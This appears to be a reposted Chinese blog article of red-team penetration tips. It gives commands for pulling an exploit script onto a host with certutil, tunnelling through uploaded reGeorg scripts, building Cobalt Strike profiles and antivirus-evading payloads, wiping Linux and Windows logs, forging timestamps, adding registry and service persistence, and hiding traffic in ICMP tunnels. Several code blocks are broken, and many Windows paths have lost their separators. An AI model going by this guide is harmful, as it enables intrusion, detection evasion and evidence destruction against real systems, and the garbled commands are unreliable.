前言
首先我们拿到一个站不能心急,凡事三思而行 跑得太快是会滑倒的。网络安全方面可以看看我的另一篇防范技巧。
当我们获得目标的时候不要急着用扫描器,这样会不仅会影响服务器的速度还会在对方的服务器日志生成大量的记录,什么站能扫什么站不能扫,心里一定要有点b数,不然可能等待的就是不一样的结果了。如果手工测试无果后再用代理手法扫描网站,必要的时候设置二级代理。当然!!!!什么站能扫什么站不能扫,心里一定要有点b数!小提示:在使用proxychains的时候,程序或者终端选项尽量不要设置任何协议的代理,否则可能会打乱这个代理回路出现网络错误。
浅蓝的渗透测试导图以及小工具
这里有一个更加详细的导图,可以做一个大致的方向参考,跟着方向逐一测试,期间也可以巩固基础。地址在这
关注公众号:hack之道,后台回复关键词:666,获取最新渗透教程和工具。
这里再附一个渗透工具包,帮助新手熟悉渗透测试:gorailgun渗透工具
AWVS + Nessus docker
1
|
# 拉取镜像
|
ZERO
首先进行信息收集你获得的信息越多对自己后面的渗透就越有帮助,whois,旁站子域,服务器操作系统版本,web中间件以及waf与cdn,通过google与github看看是否存在已知的漏洞这样有助于快速的获得权限,端口扫描并判断服务漏洞加以利用,目录的fuzz,弱口令的fuzz,google hack 进一步探测网站的信息后台以及敏感信息,撒旦天眼也是不错的信息工具。这里也推荐一个公众号:酒仙桥六号补丁
一.时刻关注返回的数据包
漏洞有很多种类型都需要渗透方认证仔细的对每个数据包已经url进行验证,要相信所有的努力都是为成功而付出的。如XSS,XSRF,sql注入,代码执行,命令执行,越权访问,目录读取,任意文件读取,下载,文件包含,远程命令执行,弱口令,上传,编辑器漏洞,暴力破解等
验证码与邮箱以及token的返回泄露,以及后台为校验从而可删除的参数。截获的敏感数据参数,学会在多个数据包反复尝试。从某个成功请求中捕获数据包观察cookie或者token是否存在规律或加密。通过修改返回的状态值,触发js进行逻辑漏洞的渗透。token的key参数解密构建获取真实user密钥,可拼接、规律、时间戳……
二.FUZZ的艺术
https://www.freebuf.com/vuls/221129.html
三.WEBBYPASS
linux反弹 shell:
1
|
|
winodws桌面:TeamViewerQS单文件
windows下载文件;
certutil -urlcache -split -f https://raw.githubusercontent.com/backlion/demo/master/CVE-2017-11882-v1.py test.py
脚本反弹内网:reGeorg
1.将 tunnel脚本(aspx | ashx | jsp | php)上传到Web服务器,访问显示“Georg says, ‘All seems fine’“,表示脚本运行正常。
2.在攻击者机器上,启动reGeorgSocksProxy.py,监听9999端口,看到 Checking if Georg is ready,确认正常运行,这个时候就可以吧目标机作为跳板了。
waf:中国蚁剑客户端,冰蝎与内存马,反复尝试使用编码字节绕过
四.提权与权限维持
首先通过检查目标服务器的进程与可利用服务以及漏洞
ssl加密payload
1
|
###生成证书并写入文件
|
老牌工具Cobaltstrike+Profiles
上云和隐藏流量参考free教程
1.利用keytool生成自己的免费证书(可在kali上生成)
keytool -genkey -alias tryblog -keyalg RSA -validity 36500 -keystore tryblog.store
2.C2.profile文件编辑
39
|
set sample_name "tryblog POS Malware";
|
3.验证c2lint,启动服务端,载入汉化运行
1
|
./c2lint C2.profile
|
免杀远控整理(来自Tide团队)
项目地址:https://github.com/QChiLan/BypassAntiVirus
windows下的免杀生成(顺序从上到下依次混淆)
如果需要捆绑正常软件运行使用shellter,如不能过免杀,再分步测试以下操作。cs文件编码混淆用AVIATOR生成。测试可以再用python再当前目录打开一个web服务器:
python3 -m http.server 8080
1.Lime-Crypter 注入线程
2.DeepSeaOBFuscator 封装
3.CryptoObfuscator 混淆
4.https 证书修改
5.base64prionx 混淆
6.themida 加壳
7.https 证书修改
8.viper(在线msf处理平台可加特征和签名很方便)
*通用免杀法(简单概括就是1.修改特征码2.花指令免杀3.加壳免杀。)
也可以通过把软件分块用杀软重复扫描找到特征码进行修改,当然也可以通过加载器的形式更加靠谱但是需要落地多个文件,c#文件自己封装推荐avator+掩盖日可以过火绒
Veil
Veil是一种免杀生成工具,用于生成绕过常见防病毒解决方案的metasploit有效负载。
一些payload加料的技巧
1、通过ssl与加壳加密palyoad(免杀)
2、通过dns或套cdn传输
windows
Exploit批量扫描:Windows-Exploit-Suggester
漏洞模块:https://github.com/SecWiki/windows-kernel-exploits
BITS免杀提权:https://github.com/ohpe/juicy-potato
linux
搜寻配置文件中的明文密码、sudo滥用
Exploit批量扫描:linux-exploit-suggester、linux-exploit-suggester-2
漏洞模块:https://github.com/SecWiki/linux-kernel-exploits
五、日志清理(细心的安全工程师会更改位置并定时备份后渗透主要还是靠细心)
windows
遇见不能删除的先停止相关服务:net stop “task scheduler”
系统日志推荐使用工具:clearlog.exe
msf清理:clearev ,run event_manager -c
1
|
防火墙日志路径:%systemroot%system32logfiles
|
linux(检索根目录以及上级目录是否存在备份)
1.清空当前用户历史命令并删除相关文件:
history -c
echo “”> /root/.bash_history
echo “”> /var/run/utmp
2.清除部分日志:echo “”> /var/log/secure;全删除如不能删除使用echo依次覆盖:rm -f -r /var/log/*;
1
|
/var/log/boot.log:录了系统在引导过程中发生的事件,就是Linux系统开机自检过程显示的信息
|
3.更新test.txt的时间和test2.txt时间戳相同:touch -r test.txt test2.txt;设定时间戳:touch -t 201605171210.20 test.txt
web容器路径
数据库通过查询配置文件定位日志(如mysql的配置文件文件my.inf,tomcat的配置文件tomcat-user.xml)
winodws
1
|
apche:C:Program FilesApache Software FoundationApache2.2htdocs"
|
linux
1
|
tomcat:/usr/local/tomcat/logs/
|
七、后渗透与流量隐匿
frsocks+protoplex+流量重定向实现端口复用
protoplex是一个协议复用的工具,比如以下命令可将本地9999端口的流量根据协议类型转到本地的2333和80端口。用于绕过云主机的nsg安全规则。
./frsocks -sockstype fsocks -listen 2333 //创建本地监听
./protoplex --socks5 192.168.154.130:2333 --http 127.0.0.1:80 -b 192.168.154.130:9999 //端口分流,根据协议类型转到本地的2333和80端口
重定向命令
linux:
sudo iptables -t nat -A PREROUTING -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 9999
windows:
netsh interface portproxy add v4tov4 listenport=80 listen address=192.168.154.129 connectport=9999 connectaddress=192.168.154.129
1
|
netsh interface portproxy show all //查看转发规则
|
将 IP 流量封装进 IMCP 的 ping 数据包进行传输
工具如下
1、icmptunnel:https://github.com/jamesbarlow/icmptunnel
2、ptunnel:http://www.cs.uit.no/~daniels/PingTunnel/
3、icmpsh:https://github.com/inquisb/icmpsh
4、Powershell-ICMP:https://github.com/api0cradle/Powershell-ICMP
5、复杂的网络环境可以使用EarchWorm(ew)实现多级代理访问目标主机
后渗透
ps:合理利用后渗透插件可以剩下很多时间,但是要注意痕迹清理。插件有谢公子和梼杌完整版比较常用,Cobaltstrike推荐插件:谢公子、梼杌、Z1-AggressorScripts、ladong
详情参考这个:https://blog.csdn.net/qq_33020901/article/details/98357659
添加开机自启
reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v "Keyname" /t REG_SZ /d "C:UsersKingXL1.exe" /f
reg add HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun /v "test" /t REG_SZ /d "C:UsersKingXL1.exe" /f
1
|
sc create "server power" binpath= "C:WindowsSystem32config.exe"
|
八、 一个便捷的HACK浏览器(上火狐开发者版本也不错)
这里个人做一个备份有需求的自行google,解释一下英文的插件功能。
Ajax Interceptor:可以自定义ajax的json返回值,前端测试用。
Anti-HoneyPot:红队用,可以检查网页中的蜜罐链接并提示。
ApiRequest.io Ajax Capture Debugging Tool:这个是神器!!强推,可以测试网页中任何的ajax请求包括跨站ajax请求重放,官网提供了只30天的请求历史记录记得保存重要请求。
Decentraleyes:可以拦截一些cdn和本地的文件跟踪器
APK Downloader for Google Play Store :免google框架在线下载应用商店的app。
Buster Captcha Solver for Humans:过goole验证码,有时候识别会比较慢。
Easy WebRTC Block:干掉webrtc的ip回显,避免泄露真实ip
IP Whois & Flags Chrome & Websites Rating:自动在后台测试当前网站ip的归属地然后以小图标的形式返回给前台非常便捷,点击进去还可以看到cdn以及whois信息。
NoScript: 慎用,此插件可以强力的拦截网页上的追踪器来保护用户的隐私与真实信息,但是会造成许多网站打开异常。
Identify web technologies :可以帮你分析当前网站所使用的网络技术与框架。
Shodan:网络搜索引擎同fofa与钟馗之眼,互联网设备大杀器
Picture-in-Picture Extension:画中画悬浮窗口看视频
SourceDetector:可以再后台默默的扫描是否有源代码泄露
HackTools:方便懒人使用点击扩展可快速复制sql,xss,反弹shell。
文章转载于xlmy.net
如侵权请私聊公众号删文
好文推荐
欢迎关注 系统安全运维
原文始发于微信公众号(系统安全运维):红蓝攻防之渗透技巧总结 建议收藏
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论